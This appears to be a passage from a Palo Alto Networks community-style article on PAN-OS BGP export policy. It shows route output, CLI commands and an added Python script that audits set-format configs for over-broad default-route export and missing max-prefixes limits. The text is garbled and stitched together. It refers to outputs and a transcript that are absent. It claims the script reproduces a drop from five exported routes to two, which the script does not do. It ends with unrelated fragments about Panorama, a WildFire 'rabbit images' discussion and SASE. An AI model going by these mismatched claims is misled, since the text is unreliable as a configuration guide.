Prefix     Nexthop        Peer           Originator  Adv Status  Aggr Status     AS-Path
0.0.0.0/0  10.0.18.1      upstream_R5    0.0.0.0     advertised  no aggregation  65535
0.0.0.0/0  192.168.102.2  inside_core_2  0.0.0.0     advertised  no aggregation  65535
total routes shown: 2

If you need the BGP learned best routes to be installed in the routing table, add this from the CLI.

[edit]
admin@PAFW1# set network virtual-router default protocol bgp install-route yes
[edit]
admin@PAFW1# commit
[edit]
admin@PAFW1# run show routing route type bgp
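The transcript above shows the two things worth checking in a PAN-OS BGP configuration before it goes live: an export rule whose match is 0.0.0.0/0 with exact no (it matches every IPv4 prefix and exports the whole table, which is what the first rib-out output shows), and a peer without a max-prefixes limit. The following Python audit is an added example, not code from the article or from Palo Alto Networks: it parses set-format lines and reports both conditions. The sample configuration is constructed to mirror the article's lines; the peer-group name "upstream" and peer-as 64500 for upstream_R5 are assumptions, since the article does not show them.

```python
"""Lint PAN-OS 'set'-format BGP configuration for over-broad export policy.

Added example; not code from the LIVEcommunity article. The sample config
below is constructed to mirror the article's lines; the 'upstream' peer-group
and its peer-as 64500 are assumptions, not values taken from the article.
"""
import re
from collections import defaultdict

SAMPLE_CONFIG = """
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 peer-as 64512
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 max-prefixes 5000
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 enable yes
set network virtual-router default protocol bgp peer-group stub_ebgp_peers enable yes
set network virtual-router default protocol bgp policy export rules default-route-only match address-prefix 0.0.0.0/0 exact no
set network virtual-router default protocol bgp policy export rules default-route-only match route-table unicast
set network virtual-router default protocol bgp policy export rules default-route-only used-by stub_ebgp_peers
set network virtual-router default protocol bgp policy export rules default-route-only enable yes
set network virtual-router default protocol bgp peer-group upstream peer upstream_R5 peer-as 64500
set network virtual-router default protocol bgp peer-group upstream peer upstream_R5 enable yes
"""

# The article's fix: make the match exact so only 0.0.0.0/0 itself is exported.
FIXED_CONFIG = SAMPLE_CONFIG.replace("exact no", "exact yes")

EXPORT_RE = re.compile(r"^set network virtual-router (\S+) protocol bgp policy export rules (\S+) (.+)$")
PEER_RE = re.compile(r"^set network virtual-router (\S+) protocol bgp peer-group (\S+) peer (\S+) (.+)$")


def parse_bgp_config(text):
    """Return (export_rules, peers): dicts keyed by (vr, rule) and (vr, group, peer)."""
    rules, peers = defaultdict(dict), defaultdict(dict)
    for raw in text.splitlines():
        line = raw.strip()
        m = EXPORT_RE.match(line)
        if m:
            vr, rule, rest = m.groups()
            tokens = rest.split()
            attrs = rules[(vr, rule)]
            if tokens[:2] == ["match", "address-prefix"]:
                # "match address-prefix <prefix> exact <yes|no>"; an absent
                # exact keyword is treated as "no" here (assumption).
                attrs["prefix"] = tokens[2]
                attrs["exact"] = len(tokens) > 4 and tokens[4] == "yes"
            elif tokens[0] == "used-by":
                attrs.setdefault("used_by", []).append(tokens[1])
            elif tokens[0] == "enable":
                attrs["enabled"] = tokens[1] == "yes"
            continue
        m = PEER_RE.match(line)
        if m:
            vr, group, peer, rest = m.groups()
            key, _, value = rest.partition(" ")   # e.g. "max-prefixes", "5000"
            peers[(vr, group, peer)][key] = value
    return rules, peers


def audit_bgp_config(text):
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    rules, peers = parse_bgp_config(text)
    findings = []
    for (vr, rule), a in sorted(rules.items()):
        # 0.0.0.0/0 with 'exact no' matches every IPv4 prefix, so the rule
        # exports the whole table, not just the default route.
        if a.get("enabled", True) and a.get("prefix") == "0.0.0.0/0" and not a.get("exact"):
            groups = ",".join(a.get("used_by", ["<no peer-group>"]))
            findings.append(f"{vr}/export/{rule}: match 0.0.0.0/0 with 'exact no' exports all routes to {groups}")
    for (vr, group, peer), a in sorted(peers.items()):
        # Without max-prefixes a misbehaving or hostile peer can fill the RIB.
        if a.get("enable") == "yes" and "max-prefixes" not in a:
            findings.append(f"{vr}/peer-group/{group}/{peer}: no max-prefixes limit configured")
    return findings


if __name__ == "__main__":
    for label, cfg in (("before fix", SAMPLE_CONFIG), ("after fix", FIXED_CONFIG)):
        print(f"== {label} ==")
        for finding in audit_bgp_config(cfg) or ["no findings"]:
            print(" ", finding)
```

Run it against the output of `show config running format set` (or `set cli config-output-format set` followed by `show`) saved to a file; the before/after pair in the block reproduces the article's change from five exported routes to two.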
Learn best practices and recommendations for securing Palo Alto Networks Panorama and Log Collector communications.
This article is based on a Palo Alto Networks LIVEcommunity discussion, WildFire analysis report rabbit images, posted by @CHOE-KyungJun and answered by @Adrian_Jensen. 
SASE (pronounced sassy) is the convergence of different access and network security methods into one cohesive platform.